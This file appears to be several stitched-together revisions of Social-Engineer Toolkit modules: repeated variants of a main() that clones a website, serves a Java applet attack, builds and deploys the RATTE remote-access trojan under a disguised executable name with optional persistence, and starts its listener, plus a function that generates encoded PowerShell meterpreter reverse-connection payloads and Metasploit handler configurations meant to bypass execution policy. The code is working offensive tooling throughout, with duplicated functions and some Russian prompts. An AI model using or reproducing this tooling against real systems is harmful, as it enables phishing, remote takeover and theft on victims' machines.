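def main():
    """Interactive entry point for the RATTE + Java applet workflow.

    Prompts the operator for the site to clone, the connect-back IP address,
    the applet port, the RATTE server port, the persistence choice and an
    optional executable name, then calls prepare_ratte(),
    java_applet_attack_tw(), ratte_listener_start() and stop_web_server_tw()
    in that order.

    Returns None. Returns early, after an error message, when the site or
    the IP address is still invalid on the third attempt.
    """
    valid_site = False
    valid_ip = False
    input_counter = 0
    site_input_counter = 0

    # Get a *VALID* website address: http/https scheme and a non-empty host.
    while not valid_site and site_input_counter < 3:
        website = raw_input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        if site.scheme in ("http", "https"):
            if site.netloc != "":
                valid_site = True
            elif site_input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                sleep(4)
                return
            else:
                core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
                site_input_counter += 1
        elif site_input_counter == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
            return
        else:
            core.print_warning("I couldn't determine whether this is an http or https site. Try again?")
            site_input_counter += 1

    while not valid_ip and input_counter < 3:
        ipaddr = raw_input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            input_counter += 1

    # Original author's note: javaport must be 80, because the applet's web
    # injection uses port 80 to download the payload.
    try:
        javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
        # "< 1" rather than "== 0" so negative numbers are rejected as well.
        while javaport < 1 or javaport > 65535:
            if javaport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(raw_input(core.setprompt(["9", "2"], "Port Java applet should listen on [80]")))
    except ValueError:
        # Empty or non-numeric input selects the default.
        javaport = 80

    try:
        ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(raw_input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
    except ValueError:
        # NOTE: the default is not re-checked against javaport, so it can
        # collide when the applet port was set to 8080.
        ratteport = 8080

    # Persistence is collected through core.yesno_prompt, which replaced the
    # older hand-rolled yes/no loop.
    persistent = core.yesno_prompt(["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    customexe = raw_input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # The file name used under reports/ is the last line of rand_gen.
    # The handle is closed by the with-block (the original never closed it).
    ratte_random = None
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()

    if ratte_random:
        # argv list instead of a shell string: neither definepath nor the
        # name read from rand_gen is ever parsed by a shell.
        subprocess.Popen(["cp",
                          "%s/src/program_junk/ratteM.exe" % (definepath),
                          "%s/reports/%s" % (definepath, ratte_random)]).wait()
    else:
        core.print_error("rand_gen is empty; nothing was copied to reports/")

    #######################
    # start ratteserver
    #######################
    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return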
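def main():
    """Collect operator input and run the RATTE + Java applet workflow.

    Asks for the site to clone, the connect-back IP address, the applet and
    RATTE server ports, whether RATTE should be persistent and an optional
    executable name. It then calls prepare_ratte(), java_applet_attack_tw(),
    ratte_listener_start() and stop_web_server_tw() in that order.

    Returns None; gives up with an error message after three invalid site
    or IP entries.
    """
    valid_site = False
    valid_ip = False
    input_counter = 0
    site_input_counter = 0

    # Get a *VALID* website address.
    while not valid_site and site_input_counter < 3:
        website = raw_input(
            core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse.urlparse(website)
        last_try = site_input_counter == 2

        if site.scheme not in ("http", "https"):
            if last_try:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            core.print_warning(
                "I couldn't determine whether this is an http or https site. Try again?")
            site_input_counter += 1
        elif site.netloc == "":
            if last_try:
                core.print_error(
                    "\nMaybe you have the address written down wrong?" + core.bcolors.ENDC)
                sleep(4)
                return
            core.print_warning("I can't determine the fqdn or IP of the site. Try again?")
            site_input_counter += 1
        else:
            valid_site = True

    while not valid_ip and input_counter < 3:
        ipaddr = raw_input(
            core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            input_counter += 1

    # Original author's note: javaport must be 80, because the applet's web
    # injection uses port 80 to download the payload.
    java_prompt = core.setprompt(["9", "2"], "Port Java applet should listen on [80]")
    try:
        javaport = int(raw_input(java_prompt))
        # Reject everything outside 1..65535; the original let negative
        # numbers through because it only compared against 0.
        while javaport < 1 or javaport > 65535:
            if javaport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(raw_input(java_prompt))
    except ValueError:
        # Empty or non-numeric input selects the default.
        javaport = 80

    ratte_prompt = core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")
    try:
        ratteport = int(raw_input(ratte_prompt))
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Port must not be equal to javaport!")
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(raw_input(ratte_prompt))
    except ValueError:
        # NOTE: the default is not re-checked against javaport.
        ratteport = 8080

    # core.yesno_prompt replaced the older hand-rolled yes/no loop.
    persistent = core.yesno_prompt(
        ["9", "2"], "Should RATTE be persistentententent [no|yes]?")

    customexe = raw_input(
        core.setprompt(["9", "2"],
                       "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Starting java applet attack...")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    # Last line of rand_gen names the copy under reports/. The with-block
    # closes the handle, which the original left open.
    ratte_random = None
    with open("%s/src/program_junk/rand_gen" % (definepath), "r") as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()

    if ratte_random:
        source_path = "%s/src/program_junk/ratteM.exe" % (definepath)
        target_path = "%s/reports/%s" % (definepath, ratte_random)
        # Passed as an argv list so no shell interprets the file-derived name.
        subprocess.Popen(["cp", source_path, target_path]).wait()
    else:
        core.print_error("rand_gen is empty; nothing was copied to reports/")

    #######################
    # start ratteserver
    #######################
    core.print_info("Starting ratteserver...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return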
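def main():
    """Interactive entry point: configure RATTE and optionally start its listener.

    Prompts for the connect-back IP address, the RATTE server port, the
    persistence choice ("NO"/"YES") and an optional executable name, calls
    prepare_ratte() with them and prints where the payload was exported.
    It then asks whether ratte_listener_start() should be called.

    Returns None; gives up with an error message after three invalid IP
    entries.
    """
    valid_ip = False
    input_counter = 0

    #################
    # get User Input
    #################
    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nMaybe you have the address written down wrong?")
                sleep(4)
                return
            input_counter += 1

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        # "< 1" rather than "== 0" so negative numbers are rejected as well.
        while ratteport < 1 or ratteport > 65535:
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # Empty or non-numeric input selects the default.
        ratteport = 8080

    persistent = None
    while persistent is None:
        answer = input(core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")).lower()
        if answer in ("no", "n"):
            persistent = "NO"
        elif answer in ("yes", "y"):
            persistent = "YES"
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    # Two-argument join: the original concatenated setdir + "ratteM.exe",
    # which yields a wrong path when setdir has no trailing separator.
    core.print_status("Payload has been exported to %s" % os.path.join(core.setdir, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # Separate flag for this prompt: the original reused the persistence
    # loop's flag, which was already True, so this loop never ran.
    listener_answered = False
    while not listener_answered:
        prompt = input(core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")).lower()
        if prompt in ("no", "n"):
            core.print_error("Aborting...")
            sleep(2)
            listener_answered = True
        elif prompt in ("yes", "y"):
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            listener_answered = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")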
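def main():
    """Prompt for the RATTE settings, build the payload, optionally start the listener.

    Collects the connect-back IP address, the RATTE server port, the
    persistence choice ("NO"/"YES") and an optional executable name, passes
    them to prepare_ratte() and prints the export path under
    core.userconfigpath. Afterwards it asks whether ratte_listener_start()
    should be called.

    Returns None; gives up with an error message after three invalid IP
    entries.
    """
    valid_ip = False
    input_counter = 0

    #################
    # get User Input
    #################
    while not valid_ip and input_counter < 3:
        ipaddr = input(
            core.setprompt(["9", "2"], "Enter the IP address to connect back on"))
        valid_ip = core.validate_ip(ipaddr)
        if valid_ip:
            break
        if input_counter == 2:
            core.print_error("\nMaybe you have the address written down wrong?")
            sleep(4)
            return
        input_counter += 1

    try:
        ratteport = int(
            input(core.setprompt(["9", "2"], "Port RATTE Server should listen on [8080]")))
        # Accept 1..65535 only; the original compared against 0 and so let
        # negative numbers through.
        while not 1 <= ratteport <= 65535:
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(
                input(core.setprompt(["9", "2"],
                                     "Enter port RATTE Server should listen on [8080]")))
    except ValueError:
        # Empty or non-numeric input selects the default.
        ratteport = 8080

    persistent = None
    while persistent is None:
        answer = input(
            core.setprompt(["9", "2"], "Should RATTE be persistent [no|yes]?")).lower()
        if answer in ("no", "n"):
            persistent = "NO"
        elif answer in ("yes", "y"):
            persistent = "YES"
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(
        core.setprompt(["9", "2"],
                       "Use specifix filename (ex. firefox.exe) [filename.exe or empty]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Payload has been exported to %s" %
                      os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # Own flag for this prompt: the original reused the flag the persistence
    # loop had already set to True, so the prompt below was unreachable.
    listener_answered = False
    while not listener_answered:
        prompt = input(
            core.setprompt(["9", "2"], "Start the ratteserver listener now [yes|no]")).lower()
        if prompt in ("no", "n"):
            core.print_error("Aborting...")
            sleep(2)
            listener_answered = True
        elif prompt in ("yes", "y"):
            core.print_info("Starting ratteserver...")
            ratte_listener_start(ratteport)
            core.print_info("Stopping ratteserver...")
            sleep(2)
            listener_answered = True
        else:
            core.print_warning("valid responses are 'n|y|N|Y|no|yes|No|Yes|NO|YES'")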
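def main():
    """Interactive entry point for the RATTE + Java applet workflow.

    Prompts the operator for the site to clone, the connect-back IP address,
    the applet port, the RATTE server port, the persistence choice and an
    optional executable name, then calls prepare_ratte(),
    java_applet_attack_tw(), ratte_listener_start() and stop_web_server_tw()
    in that order. User-facing prompts are in Russian.

    Returns None. Returns early, after an error message, when the site or
    the IP address is still invalid on the third attempt.
    """
    valid_site = False
    valid_ip = False
    input_counter = 0
    site_input_counter = 0
    ipaddr = None
    website = None

    # Get a *VALID* website address: http/https scheme and a non-empty host.
    while not valid_site and site_input_counter < 3:
        website = input(core.setprompt(["9", "2"], "Enter website to clone (ex. https://gmail.com)"))
        site = urlparse(website)
        if site.scheme in ("http", "https"):
            if site.netloc != "":
                valid_site = True
            elif site_input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?" + core.bcolors.ENDC)
                sleep(4)
                return
            else:
                core.print_warning("Я не могу определить fqdn или IP сайта. Попробуй снова?")
                site_input_counter += 1
        elif site_input_counter == 2:
            core.print_error("\nМожет быть, вы неправильно записали адрес?")
            sleep(4)
            return
        else:
            core.print_warning("Я не мог определить, является ли это http или https сайтом. Попробуй снова?")
            site_input_counter += 1

    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно записали адрес?")
                sleep(4)
                return
            input_counter += 1

    # Original author's note: javaport must be 80, because the applet's web
    # injection uses port 80 to download the payload.
    try:
        javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
        # "< 1" rather than "== 0" so negative numbers are rejected as well.
        while javaport < 1 or javaport > 65535:
            if javaport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            javaport = int(input(core.setprompt(["9", "2"], "Апплет порта Java должен слушать [80]")))
    except ValueError:
        # Empty or non-numeric input selects the default.
        javaport = 80

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
        while ratteport == javaport or ratteport < 1 or ratteport > 65535:
            if ratteport == javaport:
                core.print_warning("Порт не должен быть равен javaport!")
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            if ratteport > 65535:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Сервер RATTE порта должен слушать [8080]")))
    except ValueError:
        # NOTE: the default is not re-checked against javaport.
        ratteport = 8080

    # core.yesno_prompt replaced the older hand-rolled yes/no loop.
    persistent = core.yesno_prompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")

    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]? "))

    #######################################
    # prepare RATTE
    #######################################
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    ######################################
    # Java Applet Attack to deploy RATTE
    #######################################
    core.print_info("Запуск атаки Java-апплета..")
    java_applet_attack_tw(website, javaport, "reports/", ipaddr)

    work_dir = os.path.join(userconfigpath, definepath)

    # "rand_gen" without the leading slash: os.path.join() discards every
    # earlier component when a later one is absolute, so the original
    # "/rand_gen" opened a file in the filesystem root.
    ratte_random = None
    with open(os.path.join(work_dir, "rand_gen")) as fileopen:
        for line in fileopen:
            ratte_random = line.rstrip()

    if ratte_random:
        # argv list instead of a shell string: the paths and the name read
        # from rand_gen are never parsed by a shell.
        subprocess.Popen(["cp",
                          "%s/ratteM.exe" % work_dir,
                          "%s/reports/%s" % (definepath, ratte_random)]).wait()
    else:
        core.print_error("rand_gen is empty; nothing was copied to reports/")

    #######################
    # start ratteserver
    #######################
    core.print_info("Стартовый ратсервер...")
    ratte_listener_start(ratteport)

    ######################
    # stop webserver
    ######################
    stop_web_server_tw()
    return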
def prep_powershell_payload():
    """Generate the x86 PowerShell injection code and the matching handler config.

    Reads its settings through core.check_config() / core.check_options(),
    prompts for the connect-back address and port when they are not stored,
    appends "use exploit/multi/handler" stanzas to meta_config or
    meta_config_multipyinjector under core.setdir when the port is not
    reported as already present, and writes the generated code to
    x86.powershell under core.setdir.

    Returns None. All results are side effects: files under core.setdir,
    options stored via core.update_options(), and console output.
    """
    # grab stage encoding flag
    stage_encoding = core.check_config("STAGE_ENCODING=").lower()
    # anything other than "off" is treated as enabled
    if stage_encoding == "off":
        stage_encoding = "false"
    else:
        stage_encoding = "true"

    # check to see if we are just generating powershell code
    powershell_solo = core.check_options("POWERSHELL_SOLO")

    # check if port is there
    port = core.check_options("PORT=")

    # check if we are using auto_migrate
    auto_migrate = core.check_config("AUTO_MIGRATE=")

    # check if we are using pyinjection
    pyinjection = core.check_options("PYINJECTION=")
    if pyinjection == "ON":
        # check to ensure that the payload options were specified right
        if os.path.isfile(os.path.join(core.setdir, "payload_options.shellcode")):
            pyinjection = "on"
            core.print_status("Multi/Pyinjection was specified. Overriding config options.")
        else:
            pyinjection = "off"
    # NOTE(review): when PYINJECTION is anything other than "ON" the value is
    # left as returned, so the later `pyinjection == "off"` tests only hold if
    # core.check_options() itself returns "off" -- confirm against core.

    # grab ipaddress
    # presumably core.check_options() returns 0 when the option is not set -- verify
    if core.check_options("IPADDR=") != 0:
        ipaddr = core.check_options("IPADDR=")
    else:
        ipaddr = input("Enter the ipaddress for the reverse connection: ")
        core.update_options("IPADDR=" + ipaddr)

    # check to see if we are using multi powershell injection
    multi_injection = core.check_config("POWERSHELL_MULTI_INJECTION=").lower()

    # turn off multi injection if pyinjection is specified
    if pyinjection == "on":
        multi_injection = "off"

    # check what payloads we are using
    powershell_inject_x86 = core.check_config("POWERSHELL_INJECT_PAYLOAD_X86=")

    # if we specified a hostname then default to reverse https/http
    if not core.validate_ip(ipaddr):
        powershell_inject_x86 = "windows/meterpreter/reverse_http"

    # prompt what port to listen on for powershell then make an append to the current
    # metasploit answer file
    if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
        # if we have multi injection on, don't worry about these
        if multi_injection != "on" and pyinjection == "off":
            core.print_status("POWERSHELL_INJECTION is set to ON with multi-pyinjector")
            port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
            if not port:
                port = "443"
            with open(os.path.join(core.setdir, "meta_config_multipyinjector")) as fileopen:
                data = fileopen.read()
            # NOTE(review): port is typed input used directly as a regex pattern
            # and matched anywhere in the file, so "44" also matches an existing
            # "443" and an invalid pattern raises re.error. The branches below
            # use core.check_ports() for the same question -- consider that, or
            # at least re.escape(), here.
            match = re.search(port, data)
            if not match:
                # NOTE(review): ipaddr and port are written into the resource
                # file exactly as typed; nothing visible here rejects whitespace
                # or newlines (core.validate_ip only selects the payload above).
                # Consider validating both before writing.
                with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                    filewrite.write("\nuse exploit/multi/handler\n")
                    if auto_migrate == "ON":
                        filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                    filewrite.write("set PAYLOAD {0}\n"
                                    "set LHOST {1}\n"
                                    "set LPORT {2}\n"
                                    "set EnableStageEncoding {3}\n"
                                    "set ExitOnSession false\n"
                                    "exploit -j\n".format(powershell_inject_x86, ipaddr, port, stage_encoding))

    # if we have multi injection on, don't worry about these
    if multi_injection != "on" and pyinjection == "off":
        # check to see if the meta config multi pyinjector is there
        if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
            if core.check_options("PORT=") != 0:
                port = core.check_options("PORT=")
            # if port.options isnt there then prompt
            else:
                port = input(core.setprompt(["4"], "Enter the port for Metasploit to listen on for powershell [443]"))
                if not port:
                    port = "443"
                core.update_options("PORT={0}".format(port))

    # turn off multi_injection if we are riding solo from the powershell menu
    if powershell_solo == "ON":
        multi_injection = "off"
        pyinjection = "on"

    # if we are using multi powershell injection
    if multi_injection == "on" and pyinjection == "off":
        core.print_status("Multi-Powershell-Injection is set to ON, this should be sweet...")

    # define a base variable
    x86 = ""

    # specify a list we will use for later
    multi_injection_x86 = ""

    # here we do some funky loops so we don't need to rewrite the code below
    if multi_injection == "on":
        # port is rebound here from a single value to a list of strings
        port = core.check_config("POWERSHELL_MULTI_PORTS=")
        port = port.split(",")

    if multi_injection == "on":
        # iterate through the ports, used for POWERSHELL_MULTI_PORTS
        for ports in port:
            # dont cycle through if theres a blank
            if ports:
                core.print_status("Generating x86-based powershell injection code for port: {0}".format(ports))
                # each result is prefixed with ","; the leading comma is dropped further down
                multi_injection_x86 = multi_injection_x86 + "," + core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, ports, x86)

                if os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config_multipyinjector"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config_multipyinjector"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set LPORT {3}\n"
                                            "set ExitOnSession false\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

                # if we aren't using multi pyinjector
                if not os.path.isfile(os.path.join(core.setdir, "meta_config_multipyinjector")):
                    # if meta config isn't created yet then create it
                    # NOTE(review): os.path.isfile() is called without a path and
                    # raises TypeError as written. The lines below create and open
                    # meta_config under core.setdir, so that path is presumably
                    # what was meant -- confirm and pass it explicitly.
                    if not os.path.isfile():
                        with open(os.path.join(core.setdir, "meta_config"), "w") as filewrite:
                            filewrite.write("")
                    port_check = core.check_ports(os.path.join(core.setdir, "meta_config"), ports)
                    if not port_check:
                        with open(os.path.join(core.setdir, "meta_config"), "a") as filewrite:
                            filewrite.write("\nuse exploit/multi/handler\n")
                            if auto_migrate == "ON":
                                filewrite.write("set AutoRunScript post/windows/manage/smart_migrate\n")
                            filewrite.write("set PAYLOAD {0}\n"
                                            "set LHOST {1}\n"
                                            "set EnableStageEncoding {2}\n"
                                            "set ExitOnSession false\n"
                                            "set LPORT {3}\n"
                                            "exploit -j\n\n".format(powershell_inject_x86, ipaddr, stage_encoding, ports))

    # here we do everything if pyinjection or multi pyinjection was specified
    if pyinjection == "on":
        injections = []
        # read in the file we need for parsing
        with open(os.path.join(core.setdir, "payload_options.shellcode")) as fileopen:
            payloads = fileopen.read()[:-1].rstrip()  # strips an extra ,
        payloads = payloads.split(",")
        # format: payload<space>port
        for payload in payloads:
            # format: payload<space>port
            # an entry without a space makes payload[1] raise IndexError
            payload = payload.split(" ")
            powershell_inject_x86 = payload[0]
            port = payload[1]
            core.print_status("Generating x86-based powershell injection code...")
            injections.append(core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86))
        multi_injection_x86 = ",".join(injections)

    # if its turned to off
    if multi_injection == "off" and pyinjection == "off":
        core.print_status("Generating x86-based powershell injection code...")
        x86 = core.generate_powershell_alphanumeric_payload(powershell_inject_x86, ipaddr, port, x86)

    # if we are specifying multi powershell injection
    if multi_injection == "on" or pyinjection == "on":
        x86 = multi_injection_x86[1:]  # remove comma at beginning

    # check to see if we want to display the powershell command to the user
    verbose = core.check_config("POWERSHELL_VERBOSE=")
    if verbose.lower() == "on":
        core.print_status("Printing the x86 based encoded code...")
        time.sleep(3)
        print(x86)

    # persist the result for later steps; the file is overwritten on every run
    with open(os.path.join(core.setdir, "x86.powershell"), "w") as filewrite:
        filewrite.write(x86)

    core.print_status("Finished generating powershell injection bypass.")
    core.print_status("Encoded to bypass execution restriction policy...")
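def main():
    """Interactive entry point: configure RATTE and optionally start its listener.

    Prompts for the connect-back IP address, the RATTE server port, the
    persistence choice ("NO"/"YES") and an optional executable name, calls
    prepare_ratte() with them and prints the export path under
    core.userconfigpath. It then asks whether ratte_listener_start() should
    be called. User-facing prompts are in Russian.

    Returns None; gives up with an error message after three invalid IP
    entries.
    """
    valid_ip = False
    input_counter = 0

    #################
    # get User Input
    #################
    while not valid_ip and input_counter < 3:
        ipaddr = input(core.setprompt(["9", "2"], "Введите IP-адрес для подключения"))
        valid_ip = core.validate_ip(ipaddr)
        if not valid_ip:
            if input_counter == 2:
                core.print_error("\nМожет быть, вы неправильно написали адрес?")
                sleep(4)
                return
            input_counter += 1

    try:
        ratteport = int(input(core.setprompt(["9", "2"], "Порт RATTE Server должен прослушивать [8080]")))
        # "< 1" rather than "== 0" so negative numbers are rejected as well.
        while ratteport < 1 or ratteport > 65535:
            if ratteport < 1:
                core.print_warning(text.PORT_NOT_ZERO)
            else:
                core.print_warning(text.PORT_TOO_HIGH)
            ratteport = int(input(core.setprompt(["9", "2"], "Введите порт RATTE Сервер должен прослушивать [8080]")))
    except ValueError:
        # Empty or non-numeric input selects the default.
        ratteport = 8080

    persistent = None
    while persistent is None:
        answer = input(core.setprompt(["9", "2"], "Должен ли RATTE быть постоянным [no|yes]?")).lower()
        if answer in ("no", "n"):
            persistent = "NO"
        elif answer in ("yes", "y"):
            persistent = "YES"
        else:
            core.print_warning(text.YES_NO_RESPONSES)

    customexe = input(core.setprompt(["9", "2"], "Используйте конкретное имя файла (например, firefox.exe) [filename.exe или пусто]?"))

    ############
    # prepare RATTE
    ############
    prepare_ratte(ipaddr, ratteport, persistent, customexe)

    core.print_status("Полезная нагрузка была экспортирована в %s" % os.path.join(core.userconfigpath, "ratteM.exe"))

    ###################
    # start ratteserver
    ###################
    # Separate flag for this prompt: the original reused the persistence
    # loop's flag, which was already True, so this loop never ran.
    listener_answered = False
    while not listener_answered:
        prompt = input(core.setprompt(["9", "2"], "Запустите слушатель ratteserver сейчас [yes|no]")).lower()
        if prompt in ("no", "n"):
            core.print_error("Aborting...")
            sleep(2)
            listener_answered = True
        elif prompt in ("yes", "y"):
            core.print_info("Старт ратсервер...")
            ratte_listener_start(ratteport)
            core.print_info("Остановка ратсервера...")
            sleep(2)
            listener_answered = True
        else:
            core.print_warning("действительные ответы 'n|y|N|Y|no|yes|No|Yes|NO|YES'")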